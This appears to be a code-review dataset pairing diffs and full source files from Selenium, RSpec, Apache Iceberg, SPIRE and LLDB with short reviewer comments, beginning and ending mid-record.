.put(TOUCH_MOVE, post("/session/:sessionId/touch/move"))
.put(TOUCH_SCROLL, post("/session/:sessionId/touch/scroll"))
.put(TOUCH_DOUBLE_TAP, post("/session/:sessionId/touch/doubleclick"))
.put(TOUCH_LONG_PRESS, post("/session/:sessionId/touch/longclick"))
.put(TOUCH_FLICK, post("/session/:sessionId/touch/flick"))
.put(GET_LOG, post("/session/:sessionId/log"))
.put(GET_AVAILABLE_LOG_TYPES, get("/session/:sessionId/log/types"))
.put(STATUS, get("/status"));
nameToUrl = builder.build();
}
public void setLocalLogs(LocalLogs logs) {
this.logs = logs;
}
private void log(String logType, LogEntry entry) {
logs.addEntry(logType, entry);
}
public URL getAddressOfRemoteServer() {
return remoteServer;
}
public Response execute(Command command) throws IOException {
HttpContext context = new BasicHttpContext();
if (command.getSessionId() == null) {
if (QUIT.equals(command.getName())) {
return new Response();
}
if (!GET_ALL_SESSIONS.equals(command.getName())
&& !NEW_SESSION.equals(command.getName())) {
throw new SessionNotFoundException("Session ID is null");
}
}
CommandInfo info = nameToUrl.get(command.getName());
try {
HttpUriRequest httpMethod = info.getMethod(remoteServer, command);
setAcceptHeader(httpMethod);
if (httpMethod instanceof HttpPost) {
String payload = new BeanToJsonConverter().convert(command.getParameters());
((HttpPost) httpMethod).setEntity(new StringEntity(payload, "utf-8"));
httpMethod.addHeader("Content-Type", "application/json; charset=utf-8");
}
// Do not allow web proxy caches to cache responses to "get" commands
if (httpMethod instanceof HttpGet) {
httpMethod.addHeader("Cache-Control", "no-cache");
}
log(LogType.PROFILER, new HttpProfilerLogEntry(command.getName(), true));
HttpResponse response = fallBackExecute(context, httpMethod);
log(LogType.PROFILER, new HttpProfilerLogEntry(command.getName(), false));
response = followRedirects(client, context, response, /* redirect count */0);
final EntityWithEncoding entityWithEncoding = new EntityWithEncoding(response.getEntity());
return createResponse(response, context, entityWithEncoding);
} catch (UnsupportedCommandException e) {
if (e.getMessage() == null || "".equals(e.getMessage())) {
throw new UnsupportedOperationException(
"No information from server. Command name was: " + command.getName(),
e.getCause());
}
throw e;
}
}
private HttpResponse fallBackExecute(HttpContext context, HttpUriRequest httpMethod)
throws IOException {
try {
return client.execute(targetHost, httpMethod, context);
} catch (BindException e) {
// If we get this, there's a chance we've used all the local ephemeral sockets
// Sleep for a bit to let the OS reclaim them, then try the request again.
try {
Thread.sleep(2000);
} catch (InterruptedException ie) {
throw Throwables.propagate(ie);
}
} catch (NoHttpResponseException e) {
// If we get this, there's a chance we've used all the remote ephemeral sockets
// Sleep for a bit to let the OS reclaim them, then try the request again.
try {
Thread.sleep(2000);
} catch (InterruptedException ie) {
throw Throwables.propagate(ie);
}
}
return client.execute(targetHost, httpMethod, context);
}
private void setAcceptHeader(HttpUriRequest httpMethod) {
httpMethod.addHeader("Accept", "application/json, image/png");
}
private HttpResponse followRedirects(
HttpClient client, HttpContext context, HttpResponse response, int redirectCount) {
if (!isRedirect(response)) {
return response;
}
try {
// Make sure that the previous connection is freed.
HttpEntity httpEntity = response.getEntity();
if (httpEntity != null) {
EntityUtils.consume(httpEntity);
}
} catch (IOException e) {
throw new WebDriverException(e);
}
if (redirectCount > MAX_REDIRECTS) {
throw new WebDriverException("Maximum number of redirects exceeded. Aborting");
}
String location = response.getFirstHeader("location").getValue();
URI uri;
try {
uri = buildUri(context, location);
HttpGet get = new HttpGet(uri);
setAcceptHeader(get);
HttpResponse newResponse = client.execute(targetHost, get, context);
return followRedirects(client, context, newResponse, redirectCount + 1);
} catch (URISyntaxException e) {
throw new WebDriverException(e);
} catch (ClientProtocolException e) {
throw new WebDriverException(e);
} catch (IOException e) {
throw new WebDriverException(e);
}
}
private URI buildUri(HttpContext context, String location) throws URISyntaxException {
URI uri;
uri = new URI(location);
if (!uri.isAbsolute()) {
HttpHost host = (HttpHost) context.getAttribute(HTTP_TARGET_HOST);
uri = new URI(host.toURI() + location);
}
return uri;
}
private boolean isRedirect(HttpResponse response) {
int code = response.getStatusLine().getStatusCode();
return (code == 301 || code == 302 || code == 303 || code == 307)
&& response.containsHeader("location");
}
class EntityWithEncoding {
private final String charSet;
private final byte[] content;
EntityWithEncoding(HttpEntity entity) throws IOException {
try {
if (entity != null) {
content = EntityUtils.toByteArray(entity);
Charset entityCharset = ContentType.getOrDefault(entity).getCharset();
charSet = entityCharset != null ? entityCharset.name() : null;
} else {
content = new byte[0];
charSet = null;
}
} finally {
EntityUtils.consume(entity);
}
}
public String getContentString()
throws UnsupportedEncodingException {
return new String(content, charSet != null ? charSet : "utf-8");
}
public byte[] getContent() {
return content;
}
public boolean hasEntityContent() {
return content != null;
}
}
private Response createResponse(HttpResponse httpResponse, HttpContext context,
EntityWithEncoding entityWithEncoding) throws IOException {
final Response response;
Header header = httpResponse.getFirstHeader("Content-Type");
if (header != null && header.getValue().startsWith("application/json")) {
String responseAsText = entityWithEncoding.getContentString();
try {
response = new JsonToBeanConverter().convert(Response.class, responseAsText);
} catch (ClassCastException e) {
if (responseAsText != null && "".equals(responseAsText)) {
// The remote server has died, but has already set some headers.
// Normally this occurs when the final window of the firefox driver
// is closed on OS X. Return null, as the return value _should_ be
// being ignored. This is not an elegant solution.
return null;
}
throw new WebDriverException("Cannot convert text to response: " + responseAsText, e);
}
} else {
response = new Response();
if (header != null && header.getValue().startsWith("image/png")) {
response.setValue(entityWithEncoding.getContent());
} else if (entityWithEncoding.hasEntityContent()) {
response.setValue(entityWithEncoding.getContentString());
}
HttpHost finalHost = (HttpHost) context.getAttribute(HTTP_TARGET_HOST);
String uri = finalHost.toURI();
String sessionId = HttpSessionId.getSessionId(uri);
if (sessionId != null) {
response.setSessionId(sessionId);
}
int statusCode = httpResponse.getStatusLine().getStatusCode();
if (!(statusCode > 199 && statusCode < 300)) {
// 4xx represents an unknown command or a bad request.
if (statusCode > 399 && statusCode < 500) {
response.setStatus(ErrorCodes.UNKNOWN_COMMAND);
} else if (statusCode > 499 && statusCode < 600) {
// 5xx represents an internal server error. The response status should already be set, but
// if not, set it to a general error code.
if (response.getStatus() == ErrorCodes.SUCCESS) {
response.setStatus(ErrorCodes.UNHANDLED_ERROR);
}
} else {
response.setStatus(ErrorCodes.UNHANDLED_ERROR);
}
}
if (response.getValue() instanceof String) {
// We normalise to \n because Java will translate this to \r\n
// if this is suitable on our platform, and if we have \r\n, java will
// turn this into \r\r\n, which would be Bad!
response.setValue(((String) response.getValue()).replace("\r\n", "\n"));
}
}
response.setState(errorCodes.toState(response.getStatus()));
return response;
}
private static CommandInfo get(String url) {
return new CommandInfo(url, HttpVerb.GET);
}
private static CommandInfo post(String url) {
return new CommandInfo(url, HttpVerb.POST);
}
private static CommandInfo delete(String url) {
return new CommandInfo(url, HttpVerb.DELETE);
}
}
| 1 | 10,649 | Instead of building in routing for a browser-specific command, could you refactor the HttpCommandExecutor to allow arbitrary commands to be registered? | SeleniumHQ-selenium | java |
@@ -348,6 +348,12 @@ module RSpec::Core
end
describe "#its" do
+
+ it "should issue deprecation warning" do
+ expect_deprecation_with_call_site(__FILE__, __LINE__+1, '"its" method')
+ RSpec::Core::ExampleGroup.its(nil) {}
+ end
+
subject do
Class.new do
def initialize | 1 | require 'spec_helper'
module RSpec::Core
describe MemoizedHelpers do
before(:each) { RSpec.configuration.configure_expectation_framework }
def subject_value_for(describe_arg, &block)
group = ExampleGroup.describe(describe_arg, &block)
subject_value = nil
group.example { subject_value = subject }
group.run
subject_value
end
describe "implicit subject" do
describe "with a class" do
it "returns an instance of the class" do
expect(subject_value_for(Array)).to eq([])
end
end
describe "with a Module" do
it "returns the Module" do
expect(subject_value_for(Enumerable)).to eq(Enumerable)
end
end
describe "with a string" do
it "returns the string" do
expect(subject_value_for("Foo")).to eq("Foo")
end
end
describe "with a number" do
it "returns the number" do
expect(subject_value_for(15)).to eq(15)
end
end
it "can be overriden and super'd to from a nested group" do
outer_subject_value = inner_subject_value = nil
ExampleGroup.describe(Array) do
subject { super() << :parent_group }
example { outer_subject_value = subject }
context "nested" do
subject { super() << :child_group }
example { inner_subject_value = subject }
end
end.run
expect(outer_subject_value).to eq([:parent_group])
expect(inner_subject_value).to eq([:parent_group, :child_group])
end
end
describe "explicit subject" do
it "yields the example in which it is eval'd" do
example_yielded_to_subject = nil
example_yielded_to_example = nil
group = ExampleGroup.describe
group.subject { |e| example_yielded_to_subject = e }
group.example { |e| subject; example_yielded_to_example = e }
group.run
expect(example_yielded_to_subject).to eq example_yielded_to_example
end
[false, nil].each do |falsy_value|
context "with a value of #{falsy_value.inspect}" do
it "is evaluated once per example" do
group = ExampleGroup.describe(Array)
group.before do
Object.should_receive(:this_question?).once.and_return(falsy_value)
end
group.subject do
Object.this_question?
end
group.example do
subject
subject
end
expect(group.run).to be_truthy, "expected subject block to be evaluated only once"
end
end
end
describe "defined in a top level group" do
it "replaces the implicit subject in that group" do
subject_value = subject_value_for(Array) do
subject { [1, 2, 3] }
end
expect(subject_value).to eq([1, 2, 3])
end
end
describe "defined in a top level group" do
let(:group) do
ExampleGroup.describe do
subject{ [4, 5, 6] }
end
end
it "is available in a nested group (subclass)" do
subject_value = nil
group.describe("I'm nested!") do
example { subject_value = subject }
end.run
expect(subject_value).to eq([4, 5, 6])
end
it "is available in a doubly nested group (subclass)" do
subject_value = nil
group.describe("Nesting level 1") do
describe("Nesting level 2") do
example { subject_value = subject }
end
end.run
expect(subject_value).to eq([4, 5, 6])
end
it "can be overriden and super'd to from a nested group" do
subject_value = nil
group.describe("Nested") do
subject { super() + [:override] }
example { subject_value = subject }
end.run
expect(subject_value).to eq([4, 5, 6, :override])
end
context 'when referenced in a `before(:all)` hook' do
before do
expect(::RSpec).to respond_to(:warn_deprecation)
::RSpec.stub(:warn_deprecation)
end
def define_and_run_group
values = { :reference_lines => [] }
ExampleGroup.describe do
subject { [1, 2] }
let(:list) { %w[ a b ] }
before(:all) do
subject << 3; values[:reference_lines] << __LINE__
values[:final_subject_value_in_before_all] = subject; values[:reference_lines] << __LINE__
end
example do
list << '1'
values[:list_in_ex_1] = list
values[:subject_value_in_example] = subject
end
example do
list << '2'
values[:list_in_ex_2] = list
end
end.run
values
end
it 'memoizes the value within the before(:all) hook' do
values = define_and_run_group
expect(values.fetch(:final_subject_value_in_before_all)).to eq([1, 2, 3])
end
it 'preserves the memoization into the individual examples' do
values = define_and_run_group
expect(values.fetch(:subject_value_in_example)).to eq([1, 2, 3])
end
it 'does not cause other lets to be shared across examples' do
values = define_and_run_group
expect(values.fetch(:list_in_ex_1)).to eq(%w[ a b 1 ])
expect(values.fetch(:list_in_ex_2)).to eq(%w[ a b 2 ])
end
it 'prints a warning since `subject` declarations are not intended to be used in :all hooks' do
msgs = []
::RSpec.stub(:warn_deprecation) { |msg| msgs << msg }
values = define_and_run_group
expect(msgs).to include(*values[:reference_lines].map { |line|
match(/subject accessed.*#{__FILE__}:#{line}/m)
})
end
end
end
describe "with a name" do
it "yields the example in which it is eval'd" do
example_yielded_to_subject = nil
example_yielded_to_example = nil
group = ExampleGroup.describe
group.subject(:foo) { |e| example_yielded_to_subject = e }
group.example { |e| foo; example_yielded_to_example = e }
group.run
expect(example_yielded_to_subject).to eq example_yielded_to_example
end
it "defines a method that returns the memoized subject" do
list_value_1 = list_value_2 = subject_value_1 = subject_value_2 = nil
ExampleGroup.describe do
subject(:list) { [1, 2, 3] }
example do
list_value_1 = list
list_value_2 = list
subject_value_1 = subject
subject_value_2 = subject
end
end.run
expect(list_value_1).to eq([1, 2, 3])
expect(list_value_1).to equal(list_value_2)
expect(subject_value_1).to equal(subject_value_2)
expect(subject_value_1).to equal(list_value_1)
end
it "is referred from inside subject by the name" do
inner_subject_value = nil
ExampleGroup.describe do
subject(:list) { [1, 2, 3] }
describe 'first' do
subject(:first_element) { list.first }
example { inner_subject_value = subject }
end
end.run
expect(inner_subject_value).to eq(1)
end
it 'can continue to be referenced by the name even when an inner group redefines the subject' do
named_value = nil
ExampleGroup.describe do
subject(:named) { :outer }
describe "inner" do
subject { :inner }
example do
subject # so the inner subject method is run and memoized
named_value = self.named
end
end
end.run
expect(named_value).to eq(:outer)
end
it 'can continue to reference an inner subject after the outer subject name is referenced' do
subject_value = nil
ExampleGroup.describe do
subject(:named) { :outer }
describe "inner" do
subject { :inner }
example do
named # so the outer subject method is run and memoized
subject_value = self.subject
end
end
end.run
expect(subject_value).to eq(:inner)
end
it 'is not overriden when an inner group defines a new method with the same name' do
subject_value = nil
ExampleGroup.describe do
subject(:named) { :outer_subject }
describe "inner" do
let(:named) { :inner_named }
example { subject_value = self.subject }
end
end.run
expect(subject_value).to be(:outer_subject)
end
context 'when `super` is used' do
def should_raise_not_supported_error(&block)
ex = nil
ExampleGroup.describe do
let(:list) { ["a", "b", "c"] }
subject { [1, 2, 3] }
describe 'first' do
module_eval(&block) if block
subject(:list) { super().first(2) }
ex = example { subject }
end
end.run
expect(ex.execution_result[:status]).to eq("failed")
expect(ex.execution_result[:exception].message).to match(/super.*not supported/)
end
it 'raises a "not supported" error' do
should_raise_not_supported_error
end
context 'with a `let` definition before the named subject' do
it 'raises a "not supported" error' do
should_raise_not_supported_error do
# My first pass implementation worked unless there was a `let`
# declared before the named subject -- this let is in place to
# ensure that bug doesn't return.
let(:foo) { 3 }
end
end
end
end
end
end
context "using 'self' as an explicit subject" do
it "delegates matcher to the ExampleGroup" do
group = ExampleGroup.describe("group") do
subject { self }
def ok?; true; end
def not_ok?; false; end
it { should eq(self) }
it { should be_ok }
it { should_not be_not_ok }
end
expect(group.run).to be_truthy
end
end
describe "#its" do
subject do
Class.new do
def initialize
@call_count = 0
end
def call_count
@call_count += 1
end
end.new
end
context "with a call counter" do
its(:call_count) { should eq(1) }
end
context "with nil value" do
subject do
Class.new do
def nil_value
nil
end
end.new
end
its(:nil_value) { should be_nil }
end
context "with nested attributes" do
subject do
Class.new do
def name
"John"
end
end.new
end
its("name") { should eq("John") }
its("name.size") { should eq(4) }
its("name.size.class") { should eq(Fixnum) }
end
context "when it responds to #[]" do
subject do
Class.new do
def [](*objects)
objects.map do |object|
"#{object.class}: #{object.to_s}"
end.join("; ")
end
def name
"George"
end
end.new
end
its([:a]) { should eq("Symbol: a") }
its(['a']) { should eq("String: a") }
its([:b, 'c', 4]) { should eq("Symbol: b; String: c; Fixnum: 4") }
its(:name) { should eq("George") }
context "when referring to an attribute without the proper array syntax" do
context "it raises an error" do
its(:age) do
expect do
should eq(64)
end.to raise_error(NoMethodError)
end
end
end
end
context "when it does not respond to #[]" do
subject { Object.new }
context "it raises an error" do
its([:a]) do
expect do
should eq("Symbol: a")
end.to raise_error(NoMethodError)
end
end
end
context "calling and overriding super" do
it "calls to the subject defined in the parent group" do
group = ExampleGroup.describe(Array) do
subject { [1, 'a'] }
its(:last) { should eq("a") }
describe '.first' do
def subject; super().first; end
its(:next) { should eq(2) }
end
end
expect(group.run).to be_truthy
end
end
context "with nil subject" do
subject do
Class.new do
def initialize
@counter = -1
end
def nil_if_first_time
@counter += 1
@counter == 0 ? nil : true
end
end.new
end
its(:nil_if_first_time) { should be(nil) }
end
context "with false subject" do
subject do
Class.new do
def initialize
@counter = -1
end
def false_if_first_time
@counter += 1
@counter > 0
end
end.new
end
its(:false_if_first_time) { should be(false) }
end
describe 'accessing `subject` in `before` and `let`' do
subject { 'my subject' }
before { @subject_in_before = subject }
let(:subject_in_let) { subject }
let!(:eager_loaded_subject_in_let) { subject }
# These examples read weird, because we're actually
# specifying the behaviour of `its` itself
its(nil) { expect(subject).to eq('my subject') }
its(nil) { expect(@subject_in_before).to eq('my subject') }
its(nil) { expect(subject_in_let).to eq('my subject') }
its(nil) { expect(eager_loaded_subject_in_let).to eq('my subject') }
end
end
describe '#subject!' do
let(:prepared_array) { [1,2,3] }
subject! { prepared_array.pop }
it "evaluates subject before example" do
expect(prepared_array).to eq([1,2])
end
it "returns memoized value from first invocation" do
expect(subject).to eq(3)
end
end
end
describe "#let" do
let(:counter) do
Class.new do
def initialize
@count = 0
end
def count
@count += 1
end
end.new
end
let(:nil_value) do
@nil_value_count += 1
nil
end
it "generates an instance method" do
expect(counter.count).to eq(1)
end
it "caches the value" do
expect(counter.count).to eq(1)
expect(counter.count).to eq(2)
end
it "caches a nil value" do
@nil_value_count = 0
nil_value
nil_value
expect(@nil_value_count).to eq(1)
end
let(:yield_the_example) do |example_yielded_to_let|
@example_yielded_to_let = example_yielded_to_let
end
it "yields the example" do |example_yielded_to_example|
yield_the_example
expect(@example_yielded_to_let).to equal example_yielded_to_example
end
let(:regex_with_capture) { %r[RegexWithCapture(\d)] }
it 'does not pass the block up the ancestor chain' do
# Test for Ruby bug http://bugs.ruby-lang.org/issues/8059
expect("RegexWithCapture1".match(regex_with_capture)[1]).to eq('1')
end
it 'raises a useful error when called without a block' do
expect do
ExampleGroup.describe { let(:list) }
end.to raise_error(/#let or #subject called without a block/)
end
let(:a_value) { "a string" }
context 'when overriding let in a nested context' do
let(:a_value) { super() + " (modified)" }
it 'can use `super` to reference the parent context value' do
expect(a_value).to eq("a string (modified)")
end
end
context 'when the declaration uses `return`' do
let(:value) do
return :early_exit if @early_exit
:late_exit
end
it 'can exit the let declaration early' do
@early_exit = true
expect(value).to eq(:early_exit)
end
it 'can get past a conditional `return` statement' do
@early_exit = false
expect(value).to eq(:late_exit)
end
end
context 'when referenced in a `before(:all)` hook' do
before do
expect(::RSpec).to respond_to(:warn_deprecation)
::RSpec.stub(:warn_deprecation)
end
def define_and_run_group
values = { :reference_lines => [] }
ExampleGroup.describe do
let(:list) { [1, 2] }
subject { %w[ a b ] }
before(:all) do
list << 3; values[:reference_lines] << __LINE__
values[:final_list_value_in_before_all] = list; values[:reference_lines] << __LINE__
end
example do
subject << "1"
values[:subject_in_ex_1] = subject
values[:list_value_in_example] = list
end
example do
subject << "2"
values[:subject_in_ex_2] = subject
end
end.run
values
end
it 'memoizes the value within the before(:all) hook' do
values = define_and_run_group
expect(values.fetch(:final_list_value_in_before_all)).to eq([1, 2, 3])
end
it 'preserves the memoized value into the examples' do
values = define_and_run_group
expect(values.fetch(:list_value_in_example)).to eq([1, 2, 3])
end
it 'does not cause the subject to be shared across examples' do
values = define_and_run_group
expect(values.fetch(:subject_in_ex_1)).to eq(%w[ a b 1 ])
expect(values.fetch(:subject_in_ex_2)).to eq(%w[ a b 2 ])
end
it 'prints a warning since `let` declarations are not intended to be used in :all hooks' do
msgs = []
::RSpec.stub(:warn_deprecation) { |msg| msgs << msg }
values = define_and_run_group
expect(msgs).to include(*values[:reference_lines].map { |line|
match(/let declaration `list` accessed.*#{__FILE__}:#{line}/m)
})
end
end
context "when included modules have hooks that define memoized helpers" do
it "allows memoized helpers to override methods in previously included modules" do
group = ExampleGroup.describe do
include Module.new {
def self.included(m); m.let(:unrelated) { :unrelated }; end
}
include Module.new {
def hello_message; "Hello from module"; end
}
let(:hello_message) { "Hello from let" }
end
expect(group.new.hello_message).to eq("Hello from let")
end
end
end
describe "#let!" do
subject { [1,2,3] }
let!(:popped) { subject.pop }
it "evaluates the value non-lazily" do
expect(subject).to eq([1,2])
end
it "returns memoized value from first invocation" do
expect(popped).to eq(3)
end
end
describe 'using subject in before and let blocks' do
shared_examples_for 'a subject' do
let(:subject_id_in_let) { subject.object_id }
before { @subject_id_in_before = subject.object_id }
it 'should be memoized' do
expect(subject_id_in_let).to eq(@subject_id_in_before)
end
it { should eq(subject) }
end
describe Object do
context 'with implicit subject' do
it_should_behave_like 'a subject'
end
context 'with explicit subject' do
subject { Object.new }
it_should_behave_like 'a subject'
end
context 'with a constant subject'do
subject { 123 }
it_should_behave_like 'a subject'
end
end
end
describe 'Module#define_method' do
it 'is still a private method' do
a_module = Module.new
expect { a_module.define_method(:name) { "implementation" } }.to raise_error NoMethodError
end
end
end
| 1 | 10,694 | It'd be nice to assert the right deprecation is being raised, just add a third argument of `/"its" method/` | rspec-rspec-core | rb |
@@ -87,6 +87,8 @@ public class TableProperties {
public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled";
public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false;
+ public static final String LOCATION_PROVIDER_IMPL = "write.location-provider.impl";
+
public static final String OBJECT_STORE_PATH = "write.object-storage.path";
// This only applies to files written after this property is set. Files previously written aren't | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.iceberg;
public class TableProperties {
private TableProperties() {
}
public static final String COMMIT_NUM_RETRIES = "commit.retry.num-retries";
public static final int COMMIT_NUM_RETRIES_DEFAULT = 4;
public static final String COMMIT_MIN_RETRY_WAIT_MS = "commit.retry.min-wait-ms";
public static final int COMMIT_MIN_RETRY_WAIT_MS_DEFAULT = 100;
public static final String COMMIT_MAX_RETRY_WAIT_MS = "commit.retry.max-wait-ms";
public static final int COMMIT_MAX_RETRY_WAIT_MS_DEFAULT = 60000; // 1 minute
public static final String COMMIT_TOTAL_RETRY_TIME_MS = "commit.retry.total-timeout-ms";
public static final int COMMIT_TOTAL_RETRY_TIME_MS_DEFAULT = 1800000; // 30 minutes
public static final String MANIFEST_TARGET_SIZE_BYTES = "commit.manifest.target-size-bytes";
public static final long MANIFEST_TARGET_SIZE_BYTES_DEFAULT = 8388608; // 8 MB
public static final String MANIFEST_MIN_MERGE_COUNT = "commit.manifest.min-count-to-merge";
public static final int MANIFEST_MIN_MERGE_COUNT_DEFAULT = 100;
public static final String MANIFEST_MERGE_ENABLED = "commit.manifest-merge.enabled";
public static final boolean MANIFEST_MERGE_ENABLED_DEFAULT = true;
public static final String DEFAULT_FILE_FORMAT = "write.format.default";
public static final String DEFAULT_FILE_FORMAT_DEFAULT = "parquet";
public static final String PARQUET_ROW_GROUP_SIZE_BYTES = "write.parquet.row-group-size-bytes";
public static final String PARQUET_ROW_GROUP_SIZE_BYTES_DEFAULT = "134217728"; // 128 MB
public static final String PARQUET_PAGE_SIZE_BYTES = "write.parquet.page-size-bytes";
public static final String PARQUET_PAGE_SIZE_BYTES_DEFAULT = "1048576"; // 1 MB
public static final String PARQUET_DICT_SIZE_BYTES = "write.parquet.dict-size-bytes";
public static final String PARQUET_DICT_SIZE_BYTES_DEFAULT = "2097152"; // 2 MB
public static final String PARQUET_COMPRESSION = "write.parquet.compression-codec";
public static final String PARQUET_COMPRESSION_DEFAULT = "gzip";
public static final String PARQUET_COMPRESSION_LEVEL = "write.parquet.compression-level";
public static final String PARQUET_COMPRESSION_LEVEL_DEFAULT = null;
public static final String AVRO_COMPRESSION = "write.avro.compression-codec";
public static final String AVRO_COMPRESSION_DEFAULT = "gzip";
public static final String SPLIT_SIZE = "read.split.target-size";
public static final long SPLIT_SIZE_DEFAULT = 134217728; // 128 MB
public static final String METADATA_SPLIT_SIZE = "read.split.metadata-target-size";
public static final long METADATA_SPLIT_SIZE_DEFAULT = 32 * 1024 * 1024; // 32 MB
public static final String SPLIT_LOOKBACK = "read.split.planning-lookback";
public static final int SPLIT_LOOKBACK_DEFAULT = 10;
public static final String SPLIT_OPEN_FILE_COST = "read.split.open-file-cost";
public static final long SPLIT_OPEN_FILE_COST_DEFAULT = 4 * 1024 * 1024; // 4MB
public static final String PARQUET_VECTORIZATION_ENABLED = "read.parquet.vectorization.enabled";
public static final boolean PARQUET_VECTORIZATION_ENABLED_DEFAULT = false;
public static final String PARQUET_BATCH_SIZE = "read.parquet.vectorization.batch-size";
public static final int PARQUET_BATCH_SIZE_DEFAULT = 5000;
public static final String OBJECT_STORE_ENABLED = "write.object-storage.enabled";
public static final boolean OBJECT_STORE_ENABLED_DEFAULT = false;
public static final String OBJECT_STORE_PATH = "write.object-storage.path";
// This only applies to files written after this property is set. Files previously written aren't
// relocated to reflect this parameter.
// If not set, defaults to a "data" folder underneath the root path of the table.
public static final String WRITE_NEW_DATA_LOCATION = "write.folder-storage.path";
// This only applies to files written after this property is set. Files previously written aren't
// relocated to reflect this parameter.
// If not set, defaults to a "metadata" folder underneath the root path of the table.
public static final String WRITE_METADATA_LOCATION = "write.metadata.path";
public static final String MANIFEST_LISTS_ENABLED = "write.manifest-lists.enabled";
public static final boolean MANIFEST_LISTS_ENABLED_DEFAULT = true;
public static final String METADATA_COMPRESSION = "write.metadata.compression-codec";
public static final String METADATA_COMPRESSION_DEFAULT = "none";
public static final String METADATA_PREVIOUS_VERSIONS_MAX = "write.metadata.previous-versions-max";
public static final int METADATA_PREVIOUS_VERSIONS_MAX_DEFAULT = 100;
// This enables to delete the oldest metadata file after commit.
public static final String METADATA_DELETE_AFTER_COMMIT_ENABLED = "write.metadata.delete-after-commit.enabled";
public static final boolean METADATA_DELETE_AFTER_COMMIT_ENABLED_DEFAULT = false;
public static final String METRICS_MODE_COLUMN_CONF_PREFIX = "write.metadata.metrics.column.";
public static final String DEFAULT_WRITE_METRICS_MODE = "write.metadata.metrics.default";
public static final String DEFAULT_WRITE_METRICS_MODE_DEFAULT = "truncate(16)";
public static final String DEFAULT_NAME_MAPPING = "schema.name-mapping.default";
public static final String WRITE_AUDIT_PUBLISH_ENABLED = "write.wap.enabled";
public static final String WRITE_AUDIT_PUBLISH_ENABLED_DEFAULT = "false";
public static final String WRITE_TARGET_FILE_SIZE_BYTES = "write.target-file-size-bytes";
public static final long WRITE_TARGET_FILE_SIZE_BYTES_DEFAULT = Long.MAX_VALUE;
public static final String SNAPSHOT_ID_INHERITANCE_ENABLED = "compatibility.snapshot-id-inheritance.enabled";
public static final boolean SNAPSHOT_ID_INHERITANCE_ENABLED_DEFAULT = false;
}
| 1 | 25,793 | Do we want to add this to the docs? | apache-iceberg | java |
@@ -46,7 +46,7 @@ func AssertGRPCStatus(tb testing.TB, err error, code codes.Code, message string)
st := status.Convert(err)
ok := true
- if !assert.Equal(tb, code, st.Code(), "GRPC status code does not match") {
+ if !assert.Equal(tb, code.String(), st.Code().String(), "GRPC status code does not match") {
ok = false
}
if !assert.Equal(tb, message, st.Message(), "GRPC status message does not match") { | 1 | package spiretest
import (
"reflect"
"testing"
"github.com/google/go-cmp/cmp"
"github.com/stretchr/testify/assert"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
"google.golang.org/protobuf/proto"
"google.golang.org/protobuf/testing/protocmp"
)
var (
protoMessageType = reflect.TypeOf((*proto.Message)(nil)).Elem()
)
func RequireErrorContains(tb testing.TB, err error, contains string) {
tb.Helper()
if !AssertErrorContains(tb, err, contains) {
tb.FailNow()
}
}
func AssertErrorContains(tb testing.TB, err error, contains string) bool {
tb.Helper()
if !assert.Error(tb, err) {
return false
}
if !assert.Contains(tb, err.Error(), contains) {
return false
}
return true
}
func RequireGRPCStatus(tb testing.TB, err error, code codes.Code, message string) {
tb.Helper()
if !AssertGRPCStatus(tb, err, code, message) {
tb.FailNow()
}
}
func AssertGRPCStatus(tb testing.TB, err error, code codes.Code, message string) bool {
tb.Helper()
st := status.Convert(err)
ok := true
if !assert.Equal(tb, code, st.Code(), "GRPC status code does not match") {
ok = false
}
if !assert.Equal(tb, message, st.Message(), "GRPC status message does not match") {
ok = false
}
return ok
}
func RequireGRPCStatusContains(tb testing.TB, err error, code codes.Code, contains string) {
tb.Helper()
if !AssertGRPCStatusContains(tb, err, code, contains) {
tb.FailNow()
}
}
func AssertGRPCStatusContains(tb testing.TB, err error, code codes.Code, contains string) bool {
tb.Helper()
st := status.Convert(err)
if !assert.Equal(tb, code, st.Code(), "GRPC status code does not match") {
return false
}
if !assert.Contains(tb, st.Message(), contains, "GRPC status message does not contain substring") {
return false
}
return true
}
func RequireProtoListEqual(tb testing.TB, expected, actual interface{}) {
tb.Helper()
if !AssertProtoListEqual(tb, expected, actual) {
tb.FailNow()
}
}
func AssertProtoListEqual(tb testing.TB, expected, actual interface{}) bool {
tb.Helper()
ev := reflect.ValueOf(expected)
et := ev.Type()
av := reflect.ValueOf(actual)
at := av.Type()
if et.Kind() != reflect.Slice {
return assert.Fail(tb, "expected value is not a slice")
}
if !et.Elem().Implements(protoMessageType) {
return assert.Fail(tb, "expected value is not a slice of elements that implement proto.Message")
}
if at.Kind() != reflect.Slice {
return assert.Fail(tb, "actual value is not a slice")
}
if !at.Elem().Implements(protoMessageType) {
return assert.Fail(tb, "actual value is not a slice of elements that implement proto.Message")
}
if !assert.Equal(tb, ev.Len(), av.Len(), "expected %d elements in list; got %d", ev.Len(), av.Len()) {
// get the nice output
return assert.Equal(tb, expected, actual)
}
for i := 0; i < ev.Len(); i++ {
e := ev.Index(i).Interface().(proto.Message)
a := av.Index(i).Interface().(proto.Message)
if !AssertProtoEqual(tb, e, a, "proto %d in list is not equal", i) {
// get the nice output
return assert.Equal(tb, expected, actual)
}
}
return true
}
func RequireProtoEqual(tb testing.TB, expected, actual proto.Message, msgAndArgs ...interface{}) {
tb.Helper()
if !AssertProtoEqual(tb, expected, actual, msgAndArgs...) {
tb.FailNow()
}
}
func AssertProtoEqual(tb testing.TB, expected, actual proto.Message, msgAndArgs ...interface{}) bool {
tb.Helper()
return assert.Empty(tb, cmp.Diff(expected, actual, protocmp.Transform()), msgAndArgs...)
}
| 1 | 16,075 | This isn't really related but makes debugging test failures much easier since you see the string representation of the code instead of the integer value. | spiffe-spire | go |
@@ -130,6 +130,18 @@ bool ValueObjectVariable::UpdateValue() {
m_error.Clear();
Variable *variable = m_variable_sp.get();
+ // Check if the type has size 0. If so, there is nothing to update.
